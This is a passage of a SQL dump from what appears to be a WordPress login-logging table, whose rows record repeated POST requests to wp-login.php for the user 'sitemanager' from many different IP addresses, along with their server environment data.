00:00:00'),(94518,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41808\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746004931.6540179;s:12:\"REQUEST_TIME\";i:1746004931;}}','209.172.2.50',0,'2025-04-30 14:52:13','1970-01-01 00:00:00'),(94519,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40708\";s:11:\"REMOTE_ADDR\";s:12:\"188.213.66.6\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746005330.3002479;s:12:\"REQUEST_TIME\";i:1746005330;}}','188.213.66.6',0,'2025-04-30 14:58:52','1970-01-01 00:00:00'),(94520,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45712\";s:11:\"REMOTE_ADDR\";s:14:\"20.204.164.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746005730.042598;s:12:\"REQUEST_TIME\";i:1746005730;}}','20.204.164.126',0,'2025-04-30 15:05:31','1970-01-01 00:00:00'),(94521,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55586\";s:11:\"REMOTE_ADDR\";s:15:\"190.106.145.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746006125.3393731;s:12:\"REQUEST_TIME\";i:1746006125;}}','190.106.145.111',0,'2025-04-30 15:12:07','1970-01-01 00:00:00'),(94522,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37182\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.124.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746006518.9864459;s:12:\"REQUEST_TIME\";i:1746006518;}}','167.86.124.24',0,'2025-04-30 15:18:40','1970-01-01 00:00:00'),(94523,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57316\";s:11:\"REMOTE_ADDR\";s:15:\"103.234.209.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746006907.4991419;s:12:\"REQUEST_TIME\";i:1746006907;}}','103.234.209.234',0,'2025-04-30 15:25:09','1970-01-01 00:00:00'),(94524,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36656\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.11.121\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746007299.0905859;s:12:\"REQUEST_TIME\";i:1746007299;}}','139.59.11.121',0,'2025-04-30 15:31:40','1970-01-01 00:00:00'),(94525,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34672\";s:11:\"REMOTE_ADDR\";s:14:\"15.188.117.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746007694.1776609;s:12:\"REQUEST_TIME\";i:1746007694;}}','15.188.117.207',0,'2025-04-30 15:38:15','1970-01-01 00:00:00'),(94526,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59352\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746008075.5644741;s:12:\"REQUEST_TIME\";i:1746008075;}}','49.12.169.164',0,'2025-04-30 15:44:37','1970-01-01 00:00:00'),(94527,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38734\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746008450.661036;s:12:\"REQUEST_TIME\";i:1746008450;}}','192.64.117.71',0,'2025-04-30 15:50:52','1970-01-01 00:00:00'),(94528,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 